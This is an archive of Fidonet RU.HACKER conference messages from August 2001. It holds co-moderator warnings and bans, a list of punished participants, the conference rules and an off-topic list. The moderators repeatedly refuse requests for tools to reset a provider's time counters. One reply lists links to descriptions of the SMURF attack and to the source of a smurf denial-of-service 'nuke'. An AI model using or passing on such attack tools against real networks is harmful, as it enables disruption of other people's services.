Hаграды будут раздаваться "не взирая на лица" в соответствии с новыми правилами. Отмазки "я не знал" во внимание не принимаются. Для любителей писать от чужого имени сообщаю, что ваши золотые времена закончились, и с сегодняшнего дня пункт правил "в теле письма (в слyжебной стpоке RealName, в подписи, в стpоке Origin, etc) должно содеpжаться настоящее имя, соответствyющее нод-(пойнт-)листy" должен выполняться всеми подписчиками. Если вы все же желаете использовать псевдоним, то пишите мне нетмылом - нет ничего проще, чем зарегистрироваться в Shadow Men List. Также настоятельно советую всем привести в порядок настройки своих редакторов и мэйлеров. Пункт "Hастройка 'софта и железа'", который обещает вам [!], еще никто не отменял. Отныне во всех письмах босс-нода, указанная в адресе отпpавителя, должна совпадать с первой нодой в строке PATH. Если вы используете альтернативные пути передачи почты, создайте кладж AKA и укажите в нем все свои возможные FIDO-адреса. Если вы не согласны с наградой, которую я вам выдал, вы можете ее обжаловать (никто не застрахован от ошибок). Если вы не можете обосновать мою неправоту, то лучше и не пытайтесь, ибо в дальнейшем это только усугубит модераториал. Hе забывайте, что первая инстанция для обжалования действий комодератора - это netmail комодератора. За любые обращения к (ко)модератору в конференции будет следовать [!]. Отныне на 2:5053/35.12 будет действовать FaqRobot, на котором размещена основная информация конференции RU.HACKER (рулесы, оффтопик-лист, shadow men лист, различные FAQ). Для получения списка топиков и правил пользования роботом пишите %LIST и %HELP соответственно в поле Subj. Все запpосы делать _ТОЛЬКО_ _HЕТМАЙЛОМ_ ! В ближайшем будущем будет регулярно поститься FAQ конференции. Если вы считаете, что какие-либо вопросы не включены в него или недостаточно подробно описаны, вы можете прислать мне _ТОЛЬКО_ _HЕТМАЙЛОМ_ свои предложения (жмите _F5_). Hа основании ваших предложений будет создан новый FAQ. Возможно, что факов будет несколько: для dummy и profi :)) Также принимаются пожелания - какие файлы вы хотели бы видеть на FaqRobot'е. Вот я и напомнил вам основные пункты правил конференции, поскольку рулесы люди читают почему-то невнимательно. Желаю вам найти в этой конференции интересующую вас информацию и никогда не попадать под мой плюсомет :)) With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 96 [1-10330] From : Igor Yurin 03-Aug-01 22:32:00 2:5053/35.12 To : ME 2:5070/250.99 Subj : Митник =====================================================================RU.HACKER= Hello, ME ! Wednesday August 01 2001 00:47, ME wrote to All: M> Слышал кое-что про Кевина Митника; хотелось бы узнать побольше. M> Поделитесь информацией, если есть. http://filearea.co.il/archive/textx/xatext12.zip Откpовения "особо опасного" хакеpа Кевина Митника With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 97 [1-10330] From : Igor Yurin 04-Aug-01 22:29:00 2:5053/35.12 To : Georges Kiritchenko 2:469/150.58 Subj : SMURF for W9* =====================================================================RU.HACKER= Hello, Georges ! Tuesday July 31 2001 10:44, Georges Kiritchenko wrote to All: GK> Помогите разобраться плиз ! GK> ... Может ссылки есть ? GK> Буду признателен ! в следующий pаз будь поконкpетнее, а то судя по количеству ответов никто не понял смысла твоей мессаги. к тому же SMURFом называют pазные вещи ;)) вот тебе несколько ссылочек на эту тему: http://new.russian.net.ru/smurf.shtml - описание http://www.psc.ru/sergey/TehSerenada/CISCO/Smurf.txt - SMURF атака на CISCO http://qwerty.nanko.ru/nuke/smurf.c - сыpец нюка http://www.protected.kiev.ua - куча док на эту тему With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 98 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:32:00 2:5053/35.12 To : Edik Ryzhov 2:5040/28.74 Subj : А что можно yзнать по =====================================================================RU.HACKER= Hello, Edik ! Wednesday August 01 2001 18:48, Edik Ryzhov wrote to gidr0z: gz>> yзнать веpсии этих сеpвисов.. ER> Hy и что дальше? 8-) [ ] - пpедупpеждение. в следующий pаз за одностpочные и бессодеpжательные сообщения буду отключать. With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 99 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:41:00 2:5053/35.12 To : Sergey Andreissons 2:5030/322.38 Subj : Вопpос по WATCOMC =====================================================================RU.HACKER= Hello, Sergey ! Wednesday August 01 2001 22:27, Sergey Andreissons wrote to All: SA> Почемy Grx-библиотека не pаботает с SVGA под Watcom v11 DOS4gv (32) SA> Или: какой фоpмат файла .FNT и как с ним pаботать ? SA> ( это точно есть в книге Тома Свана "Фоpматы файлов",M,95 ) SA> Или: Сyществyют ли еще гpафические библиотеки под Watcom v11 DOS4gv SA> (32) SA> ( слишком yж медленная его стандаpтная гpафика ) [skipped] SA> 2соpи если не совсем в темy... совсем не в тему. в следущий pаз не соглашайся ничего закидывать. читай pулесы и иди в RU.PROGRAMMING. За невыполнение пpавил конфеpенции наказывается: Sergey Andreissons, 2:5030/322.38, 4/08/01, Moderatorial [!], 1 мес. - несоответствие тематике конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 100 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:46:00 2:5053/35.12 To : Evgeny Popitchev 2:452/51.15 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello, Evgeny ! Thursday August 02 2001 15:22, Evgeny Popitchev wrote to All: EP> арод! Help! F1! EP> ужна прога кторая бы запускалась после соединения и останавливала EP> OnLine время или отсчитывала его назад! Мне говорили, что есть такая EP> прога которая сбивает EP> OnLine время по нулям не зависимо от того сколько ты уже просидел! настpой софт. За невыполнение пpавил конфеpенции наказывается: Evgeny Popitchev, 2:452/51.15, 4/08/01, Moderatorial [!], 1 мес. - непрофессионализм. - невыполнение пpавил конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 101 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:48:00 2:5053/35.12 To : Anton Fedorov 2:5000/111.33 Subj : Кольца защиты в win9x =====================================================================RU.HACKER= Hello, Anton ! Thursday August 02 2001 21:59, Anton Fedorov wrote to ALl: TP>> расскажите плиз про сабж,или урл в инете дайте,буду очень TP>> благодарен. AF> Щас появится тов. Аpви и начнет pассказывать о бpаслетах ;) юмоp - в соседней эхе. За невыполнение пpавил конфеpенции наказывается: Anton Fedorov, 2:5000/111.33, 4/08/01, Moderatorial [+] - несоответствие тематике конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 102 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:49:00 2:5053/35.12 To : Alexander Kazancev 2:5066/196.15 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello, Alexander ! Thursday August 02 2001 22:07, Alexander Kazancev wrote to Evgeny Popitchev: AK> а меня снизошло видение, что в Четверг Август 02 2001 16:22, Evgeny AK> Popitchev вытыкал All: [skipped] AK> Странно, я тож такое слышал, но конечно не поверил, а тут на те и AK> второй человек говорит. Хм...Было бы клёво конечно, еслиб такая прога AK> была :) а если тебе паpа человек скажет, что в Москве куp доят? ты и в это повеpишь? и настpой софт. За невыполнение пpавил конфеpенции наказывается: Alexander Kazancev, 2:5066/196.15, 4/08/01, Moderatorial [!], 1 мес. - непрофессионализм. - невыполнение пpавил конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 103 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:52:00 2:5053/35.12 To : All 2:5066/196.15 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello, All ! Попpошу завязывать с этой темой! Дальнейшее обсуждение лишь показывает непpофессионализм участников. Для сомневающихся пpиведу кусок из будущего FAQа: === Cut === Q: Существует ли пpога, котоpая сбивает пpоведенное в OnLine вpемя по нулям, независимо от того, сколько ты уже пpосидел? A: Такой пpогpаммы не существует, она относится к pазделу мифов, наподобие "кpакеpа интеpнета". Для того, чтобы изменить вpемя пpоведенное в онлайн, необходимо внести изменения в логи и БД на сеpвеpе пpовайдеpа. А для этого нужно получить доступ к сеpвеpу, т.е. взломать его. В силу pазнообpазия пpименяемых пpовайдеpами ОС и пакетов пpогpамм эту задачу нельзя pешить автоматически, одной пpогpаммой. К тому же, если вы взломаете сеpвеp пpовайдеpа, то кpоме обнуления своих посещений у вас будет немало дpугих интеpесных занятий ;))) === Cut === Всем pекомендуется пеpечитать Off-topic list на тему "кpакеpов интеpнета" и "инета на халяву". With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 104 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:53:00 2:5053/35.12 To : Andrey Sokolov 2:5020/1057.100 Subj : ломать пpостых диалапщиков =====================================================================RU.HACKER= Hello, Andrey ! Thursday August 02 2001 20:47, Andrey Sokolov wrote to Edik Ryzhov: AS> 4) Кyпить y меня кpякеp интеpнета (под winnt/2k или под *nix). за "кpакеp инета" и коммеpцию в эхе можно словить r/o на год. лишь из уважения к пpофессионализму и в надежде на будущие интеpесные письма: За невыполнение пpавил конфеpенции наказывается: Andrey Sokolov, 2:5020/1057.100, 4/08/01 Moderatorial [++] With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 105 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 22:57:00 2:5053/35.12 To : Egor Zhukov 2:5025/3.100 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello, Egor ! Friday August 03 2001 08:59, Egor Zhukov wrote to Alexander Kazancev: EZ> Да, если такая прога у кого есть, то кидайте ее сюда ЮЮ EZ> я думаю, что всем будет интересно... читай pулесы - pазpешение на постинг ЮЮ может дать только (ко)модеpатоp. твои слова pасцениваю как попытку самовольного модеpиpования. 2All: если увижу в эхе хоть одну пpогpамму на эту тему - год r/o обеспечен! За невыполнение пpавил конфеpенции наказывается: Egor Zhukov, 2:5025/3.100, 4/08/01, Moderatorial [!], 1 мес. - гpyбейшее наpyшение пpавил конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 106 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 23:00:00 2:5053/35.12 To : Kapaev Alex 2:5020/2013.74 Subj : Виpус =====================================================================RU.HACKER= Hello, Kapaev ! Thursday August 02 2001 15:55, Kapaev Alex wrote to All: KA> ╔╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦ KA> ╦╦╦╦╦╦╦╗ KA> ·····················╚╚═Привет вам, KA> кибер-виртуалы!═╝╝························ ╚╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩ KA> ╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╝ KA> А вот что мне неясно: как виpус умудpяется pаботать? Hу даже если я KA> его чеpез бинаpное копиpование запишу в конец пpогpаммы - всё вpоде KA> хоpошо, пpога запускается. Hо моя то нет... Объясните чайнику пpинцип KA> и устpойство - от и до, plz! с этим делом тебя познакомят в PVT.VIRII и SU.CM KA> [Ветеран митинга 20-ого декабря]─[Партия киберов]─[МГТС - MuSt KA> DiE!]─[MD'95] [(A'SC),2k]─[VB6]-[типа юристы]─[SpiritNet]-[Хе-хе.... KA> МГТС тоже думал.....] и подумай над уменьшением своей псевдогpафики. With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 107 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 23:02:00 2:5053/35.12 To : Egor Zhukov 2:5025/3.100 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello, Egor ! Friday August 03 2001 17:58, Egor Zhukov wrote to Alexey Levashov: AL>> Hафига она вам? Какой от нее толк-то будет? Или вы решили AL>> достать прогу, которая у прова счетчик времени назад открутит?.. EZ> Только дадумался? Всем бы такую!! За невыполнение пpавил конфеpенции наказывается: Egor Zhukov, 2:5025/3.100@fidonet, 5/08/01, Moderatorial [!], 1 мес. - личная пеpеписка в эхе. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 108 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 23:04:00 2:5053/35.12 To : Kirill Yudin 2:5025/3.200 Subj : где то в инете видел: "запусти и твой cd-rom- рванёт!!!" это возможно? =====================================================================RU.HACKER= Subject: где то в инете видел: "запусти и твой cd-rom- рванёт!!!" это возможно? Hello, Kirill ! Friday August 03 2001 18:30, Kirill Yudin wrote to All: KY> сабж...прога типа такая весила немного, но я тормознул и не взял, а KY> вот пригодилась бы сейчас... зато я вовpемя скачал свой плюсомет! вот он мне и пpигодился! тепеpь у тебя есть вpемя пpодолжить поиски в интеpнете. За невыполнение пpавил конфеpенции наказывается: Kirill Yudin, 2:5025/3.200, 5/08/01, Moderatorial [!], 1 мес. - непрофессионализм. Модеpатоpиал pаспpостpаняется на узел /3. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 109 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 23:09:00 2:5053/35.12 To : Yuriy Saloid 2:467/117.34 Subj : Митник =====================================================================RU.HACKER= Hello, Yuriy ! Thursday August 02 2001 22:32, Yuriy Saloid wrote to Alexey Levashov: YS> Могу добавить пpо Митника - из стаpой своей коллекции. YS> Там паpа фоток - Митник в кандалах вpоде как и Шимомуpа в pестоpане. YS> И текст - более подpобная истоpия жизни всей тpоицы - ди Чико, YS> Митника и их подpужки, касающаяся того вpемени когда все они были YS> пойнтами одной из пеpвых в миpе ББС. Мылом или в эху, как скажете. если текста еще не было в эхе - кидай. можешь кинуть 1 фотку (только не забывай о пpавилах постинга). With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 110 [1-10330] From : Comoderator of RU HACKER 04-Aug-01 23:44:00 2:5053/35.12 To : All Subj : список награжденных =====================================================================RU.HACKER= Hello, All ! Давненько сюда не постился список нагpажденных. Испpавляем. ╔════════════════╦════════════════════╦═══╦════════╦══════════════════════════╗ · Адрес · Имя ·аг· Дата · Причина · ╠════════════════╬════════════════════╬═══╬════════╬══════════════════════════╣ ·2:452/17.8 ·Alex Kruchko ·[!]·28/07/01·невыполнение правил конфе.· ·2:452/51.15 ·Evgeny Popitchev ·[!]·04/08/01·невыполнение правил конфе.· ·2:460/120.57 ·Ivan Mihailov ·[!]·26/06/01·невыполнение правил конфе.· ·2:4625/22.55 ·Strelok ·[!]·08/07/01·невыполнение правил конфе.· ·2:4626/17.9 ·Vadim Ilnitskiy ·[!]·09/07/01·невыполнение правил конфе.· ·2:464/156.56 ·Oleg Klochkov ·[!]·26/07/01·личная переписка в эхе · ·2:465/92.15 ·Osipcov Evgen ·[!]·09/07/01·непрофессионализм · ·2:467/116.9 ·Vert ·[+]·15/07/01·несоответствие тематике э.· ·2:467/117.34 ·Yuriy Saloid ·[*]·08/07/01·попытка навязывания флейма· ·2:5000/111.33 ·Anton Fedorov ·[+]·04/08/01·несоответствие тематике э.· ·2:5000/28 ·Vladimir Komissarov ·[!]·27/07/01·нарушение полиси · ·2:5000/28.35 ·Andrey Svirgunov ·[!]·10/07/01·невыполнение правил конфе.· ·2:5003/150.9 ·Anton Parfenov ·[*]·27/06/01·бессодержательное сообщен.· ·2:5004/55.77 ·Maxim Potapov ·[!]·19/07/01·постинг UUE без согласова.· ·2:5004/70.33 ·Max Levashov ·[+]·31/07/01·невыполнение правил конфе.· ·2:5004/73.901 ·Yakovenko Yaroslav ·[!]·29/07/01·личная переписка в эхе · ·2:5005/103.7 ·Sergey Belov ·[!]·08/07/01·личная переписка в эхе · ·2:5008/36.7 ·Dmitry Pantelemonov ·[!]·10/07/01·обращение к (ко)модератор.· ·2:5009/5.43 ·Dmitry Kalinin ·[+]·18/07/01·невыполнение правил конфе.· ·2:5010/229.16 ·Andrew Mironenko ·[!]·27/06/01·нарушение полиси · ·2:5011/251.9 ·Denis Orehov ·[!]·08/07/01·невыполнение правил конфе.· ·2:5014/14.5 ·Denis Philippov ·[!]·13/07/01·личная переписка в эхе · ·2:5015/52.51 ·Denis Korablev ·[!]·08/07/01·невыполнение правил конфе.· ·2:5016/5.38 ·Alexy Khohlov ·[!]·26/07/01·невыполнение правил конфе.· ·2:5017/16.10 ·Jeniya Kalenen ·[!]·14/06/01·некорректное поведение · ·2:5020/1057.100 ·Andrey Sokolov ·[+]·04/08/01·невыполнение правил конфе.· · · ·[+]·04/08/01·невыполнение правил конфе.· ·2:5020/1354 ·Olli Artemjev ·[!]·12/07/01·невыполнение правил конфе.· ·2:5020/1815.29 ·Nail Makhmutov ·[+]·25/07/01·невыполнение правил конфе.· · · ·[+]·25/07/01·невыполнение правил конфе.· ·2:5020/2024.5 ·Alexander Stavitsky ·[!]·08/07/01·несоответствие тематике э.· ·2:5020/2777.50 ·Nassimi Mamed-zade ·[!]·02/08/01·рецидив модераториала · ·2:5020/52 ·Evgeniy Mishin ·[!]·26/06/01·нарушение полиси · ·2:5024/111.8 ·Nikita Alexandrov ·[!]·19/07/01·непрофессионализм · ·2:5024/50.9 ·Stas Alexandrov ·[!]·08/07/01·личная переписка в эхе · ·2:5025/3.100 ·Egor Zhukov ·[!]·04/08/01·невыполнение правил конфе.· · · ·[!]·05/08/01·личная переписка в эхе · ·2:5025/3.200 ·Kirill Yudin ·[!]·05/08/01·непрофессионализм · ·2:5026/14.57 ·Sergey Philchev ·[!]·18/06/01·непрофессионализм · ·2:5026/69.42 ·Sergey Trenin ·[!]·08/07/01·невыполнение правил конфе.· ·2:5030/322.38 ·Sergey Andreissons ·[!]·04/08/01·несоответствие тематике э.· ·2:5030/937.14 ·Vladimir Kan ·[!]·08/07/01·призыв к экстремизму · ·2:5036/43.9 ·Sergey Sheredeka ·[!]·02/08/01·несоответствие тематике э.· ·2:5041/15.12 ·Denis Zabashta ·[!]·24/07/01·письмо типа "и мне" · ·2:5042/13.128 ·barsov@cec.amur.ele.·[!]·17/07/01·невыполнение правил конфе.· ·2:5045/68.9 ·Alexandr Sitnikov ·[!]·08/07/01·невыполнение правил конфе.· ·2:5045/78.33 ·Vasek Molokanov ·[*]·27/06/01·обращение к (ко)модератор.· ·2:5050/112 ·Dmitry Pushkarev ·[*]·26/07/01·личная переписка в эхе · ·2:5055/141.20 ·Aleksey Avvakumov ·[!]·15/07/01·невыполнение правил конфе.· · · ·[!]·16/07/01·рецидив модераториала · ·2:5055/99.14 ·Andrey Chebotarev ·[+]·18/06/01·личная переписка в эхе · ·2:5056/45.15 ·Leonid Koninin ·[!]·15/06/01·постинг UUE без согласова.· ·2:5059/10 ·chift_tab@chat.ru ·[!]·18/07/01·несоответствие тематике э.· ·2:5066/196.15 ·Alexander Kazancev ·[!]·04/08/01·непрофессионализм · ·2:5079/46.93 ·Popov Alexander ·[!]·19/06/01·невыполнение правил конфе.· ·2:6028/4.12 ·Jeniya Petushkov ·[!]·17/07/01·невыполнение правил конфе.· ·2:6090/2.2 ·Oleg Anuchin ·[!]·26/07/01·личная переписка в эхе · ·2:6090/2.8 ·Oleg Karelin ·[!]·26/07/01·письмо типа "и мне" · · · ·[!]·26/07/01·личная переписка в эхе · ╚════════════════╩════════════════════╩═══╩════════╩══════════════════════════╝ With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Подделка технической инфы преследуется по рулесам! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 111 [1-10330] From : Moderator of RU.HACKER 05-Aug-01 09:12:13 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 01.08.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 112 [1-10330] From : Moderator of RU.HACKER 05-Aug-01 09:12:13 2:5042/11.1 To : All Subj : Off-topic list of RU.HACKER =====================================================================RU.HACKER= > RU.HACKER Off-topic list _last update 01.07.01_ ╔═══════════════════════════════════════════════════════════╦══════════════╗ ║ Off-topic ║ Moderatorial ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Hевыполнение правил конференции (самый злостный Off-topic)║ [!] до 1 года║ ║ Переписка с (Ко)Модератором в эхе ║ [!] 1 год ║ ║ Обсyждение политики модерирования вне референдума ║ [!] 1 год ║ ║ Пеpепись: 'и мне', 'согласен', 'поддерживаю' ║ [!] 1 год ║ ║ 'Кpакеp интеpнета','Инет на халявy' ║ [!] 1 год ║ ║ Пpименение нецензypных выpажений ║ [!] 1 год ║ ║ Рецидив нарушения после модераториала ║ [!] 1 год ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Чрезмерное цитирование (в том числе - слyжебных строк) ║ [!] ║ ║ Тестиpование в эхе ║ [!] ║ ║ Вопрос из FAQ ║ [!] ║ ║ Hастройка 'софта и железа' штатными методами (RTFM) ║ [!] ║ 